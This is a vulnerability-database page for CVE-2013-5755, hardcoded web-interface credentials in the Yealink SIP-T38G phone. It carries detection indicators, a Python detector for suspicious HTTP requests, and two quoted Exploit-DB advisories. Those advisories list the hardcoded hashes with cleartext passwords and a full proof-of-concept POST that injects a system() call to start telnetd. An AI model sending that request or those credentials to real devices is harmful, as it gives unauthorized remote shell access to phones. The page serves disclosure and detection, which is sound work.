CVE-2013-5755
Published 2014-07-16
Priority: P2 · 60 · critical · CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit available
EPSS: 4.34% (90.0th percentile)
config/.htpasswd in Yealink IP Phone SIP-T38G has a hardcoded password of (1) user (s7C9Cx.rLsWFA) for the user account, (2) admin (uoCbM.VEiKQto) for the admin account, and (3) var (jhl3iZAe./qXM) for the var account, which makes it easier for remote attackers to obtain access via unspecified vectors.
Detection & IOCs (extracted from sources)
- Detect POST requests to /cgi-bin/cgiServer.exx, particularly with a body containing OS command injection via the system() function
- Alert on use of the hardcoded Base64 Basic Auth header 'YWRtaW46YWRtaW4=' (admin:admin) in HTTP requests to Yealink SIP-T38G devices
- Monitor for telnetd activation commands on Yealink SIP-T38G devices, indicating post-exploitation persistence via the busybox telnet daemon
- Flag HTTP requests to /config/.htpasswd on Yealink SIP-T38G devices, as this file contains hardcoded credential hashes
- Three hardcoded accounts exist in /config/.htpasswd with known cleartext passwords: user:user, admin:admin, var:var; all are trivially guessable and cannot be changed without firmware modification
- The hardcoded credentials are present in the .htpasswd file as fixed hashes and protect the web management interface; exploitation does not require any prior knowledge beyond these published values
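The indicators above can be checked mechanically against captured HTTP traffic. The following is an added example, not part of the CVE record or of the Exploit-DB advisories: a small request parser that flags the default-credential Basic Auth header, POSTs to /cgi-bin/cgiServer.exx carrying a system() call or a telnetd activation, and reads of /config/.htpasswd. The sample requests are constructed for illustration; the indicator names (`default-credentials`, `post-cgiServer`, `system-call-in-body`, `telnetd-activation`, `htpasswd-read`) are this example's own labels.

```python
"""Detection helper for the Yealink SIP-T38G indicators listed on this page.

Added example (not the page's or the vendor's code). It parses raw HTTP
requests, as captured by a proxy or IDS, and reports which indicators from
the Detection & IOCs list each request matches.
"""
import base64
import binascii
from typing import Dict, List, Optional, Tuple

# Default credential pairs published for the phone (from the CVE text).
DEFAULT_CREDS = {("user", "user"), ("admin", "admin"), ("var", "var")}
CGI_PATH = "/cgi-bin/cgiServer.exx"
HTPASSWD_PATH = "/config/.htpasswd"


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP request into (method, path, headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, path, _ = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_basic_auth(value: str) -> Optional[Tuple[str, str]]:
    """Return (user, password) from a 'Basic <b64>' header value, or None.

    Trailing text after the token (as in the advisory's annotated header)
    is ignored; malformed Base64 yields None rather than an exception.
    """
    parts = value.split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    token = parts[1].split()[0]
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def check_request(raw: str) -> List[str]:
    """Return the indicator labels that match one raw HTTP request."""
    method, path, headers, body = parse_request(raw)
    path = path.split("?", 1)[0]
    findings: List[str] = []
    creds = decode_basic_auth(headers.get("authorization", ""))
    if creds in DEFAULT_CREDS:
        findings.append(f"default-credentials:{creds[0]}")
    if method.upper() == "POST" and path == CGI_PATH:
        findings.append("post-cgiServer")
        if "system(" in body:
            findings.append("system-call-in-body")
        if "telnetd" in body:
            findings.append("telnetd-activation")
    if path == HTPASSWD_PATH:
        findings.append("htpasswd-read")
    return findings


# Constructed sample traffic: one request shaped like the published PoC,
# one read of the credential file, and one benign request with a non-default user.
SAMPLE_REQUESTS = {
    "poc": (
        "POST /cgi-bin/cgiServer.exx HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
        'system("/bin/busybox%20telnetd%20start")'
    ),
    "htpasswd": "GET /config/.htpasswd HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
    "benign": (
        "GET /index.html HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "Authorization: Basic b3BlcmF0b3I6Y29ycmVjdGhvcnNl\r\n"
        "\r\n"
    ),
}


def scan(samples: Dict[str, str]) -> Dict[str, List[str]]:
    """Run check_request over a labelled set of requests."""
    return {label: check_request(raw) for label, raw in samples.items()}


if __name__ == "__main__":
    for label, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{label}: {', '.join(hits) or 'no indicators'}")
```

Matching only on the exact Base64 string would miss the same credentials with a different padding or a different account (user:user, var:var), so the check decodes the header and compares the pair; the body checks are deliberately loose substring matches because the cgiServer.exx endpoint should never legitimately receive a system() call.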
No detection rules found.
Exploit-DB: Yealink VoIP Phone SIP-T38G - Remote Command Execution
exploitdb · 2014-06-13 · CVSS 10.0 · CVE-2013-5759 [CRITICAL]
---
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
Description:
Using cgiServer.exx we are able to send OS command using the system function.
POC:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20telnetd%20start")
-- Mr.Un1k0d3r
Exploit-DB: Yealink VoIP Phone SIP-T38G - Default Credentials
exploitdb · 2014-06-13 · CVSS 10.0 · CVE-2013-5755 [CRITICAL]
---
Title: Yealink VoIP Phone SIP-T38G Default Credentials
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5755
Description:
Web interface use hardcoded default credential in /config/.htpasswd
user:s7C9Cx.rLsWFA admin:uoCbM.VEiKQto var:jhl3iZAe./qXM
Here's the cleartext password for these accounts:
user:user
admin:admin
var:var
-- Mr.Un1k0d3r
No writeups or analysis indexed.